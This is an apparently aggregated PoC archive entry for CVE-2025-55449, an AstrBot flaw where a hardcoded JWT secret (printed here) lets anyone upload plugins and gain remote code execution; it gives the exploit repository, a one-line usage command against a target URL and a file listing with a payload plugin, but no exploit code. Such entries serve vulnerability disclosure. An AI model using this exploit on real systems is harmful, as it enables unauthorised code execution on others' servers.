Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-55449 PoC — AstrBot 安全漏洞

Source
https://github.com/Marven11/CVE-2025-55449-AstrBot-RCE
Associated Vulnerability
Title:AstrBot 安全漏洞 (CVE-2025-55449)
Description:AstrBotDevs AstrBot 3.5.15 has Advanced_System_for_Text_Response_and_Bot_Operations_Tool as the hardcoded private key used to sign a JWT.
Description
AstrBot老版本RCE
Readme
# 介绍

AstrBot<=3.5.17在[源码中](https://github.com/AstrBotDevs/AstrBot/blob/v3.5.17/astrbot/core/__init__.py)硬编码了JWT secret,导致可以任意上传插件,实现RCE

# 使用

```shell
python main.py 'http://127.0.0.1:6185'
```

# 源码

https://github.com/AstrBotDevs/AstrBot.git
File Snapshot

 [4.0K]  /data/pocs/355c7a85aca963770a97c8fdc0f26b8916d217fc
├── [1.9K]  flake.lock
├── [2.5K]  flake.nix
├── [1.7K]  main.py
├── [4.0K]  payload-zip-main
│   ├── [1.0K]  LICENSE
│   ├── [1.1K]  main.py
│   ├── [ 302]  metadata.yaml
│   └── [   5]  README.md
└── [ 302]  README.md

2 directories, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →